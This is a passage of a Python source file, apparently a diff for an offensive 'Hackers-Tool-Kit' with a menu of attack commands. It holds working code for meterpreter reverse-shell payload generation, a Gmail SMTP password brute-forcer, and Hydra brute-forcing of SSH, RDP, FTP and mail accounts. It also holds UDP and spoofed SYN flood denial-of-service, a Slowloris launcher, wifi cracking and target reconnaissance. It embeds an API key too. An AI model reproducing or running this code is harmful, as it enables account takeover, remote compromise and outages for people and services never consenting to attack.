\033[0m▀▀▀\033[31m ▀▀ ▀▀\033[0m + """.decode('utf-8') +def mainbanner17(): + print """ + + .---. + |---| + type |-\033[32m?\033[0m-| for help + |---| + .---^ - ^---. + :___________: + \033[31m▄█ █▄\033[0m | |//| \033[32m▄█ ▄█▄\033[0m + ███ ███ | |//| ███ ▄███▀ + ███ ███ | |//| ███▐██▀ + ███▄▄▄▄███ | |//| █████▀ + ███▀▀▀▀███ | |//| █████▄ + ███ ███ | |//| ███▐██▄ + ███ ███ | |.-| ███ ▀███▄ + \033[31m███ ███\033[0m |.-'**| \033[32m███ ▀█▀\033[0m + \***/ + \*\033[91m/\033[31m + V\033[0m + """.decode('utf-8') + +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,17) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() + if num == 8: + mainbanner8() + if num == 9: + mainbanner9() + if num == 10: + mainbanner10() + if num == 11: + mainbanner11() + if num == 12: + mainbanner12() + if num == 13: + mainbanner13() + if num == 14: + mainbanner14() + if num == 15: + mainbanner15() + if num == 16: + mainbanner16() + if num == 17: + mainbanner17() +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +? : displays this message +clear : clears screen except for banner +clearall: clears everything on screen +banner : clears screen and shows new banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +aserver : start a apache server +run : run a file +phpload : make a php reverse_tcp payload and start it in a multi handler +pyload : make a python reverse_tcp payload and start it in a multi handler +foxhis : gather firefox history from privileged javascript shell +rhawk : run the RED_HAWK script (info gathering tool) +\033[91m---------------------------------------------------------------------------------\033[0m + """ +#-----------------# +#HELP BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + +#GMAIL BRUTEFORCE START# +#----------------------# +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# +def wifite(): + os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# +def netdev(): + os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +#------------------# +#INFO SCAN HOST END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + +#ALL METASPLOIT EXPLOITS START# +#-----------------------------# +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() +#-------------# +#SYN FLOOD END# + + +#PING A HOST START# +#-----------------# +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + +#HYDRA AUTOMATED START# +#---------------------# +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + + +#MONITOR MODE OFF START# +#----------------------# +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +#---------------------# +#SCAN 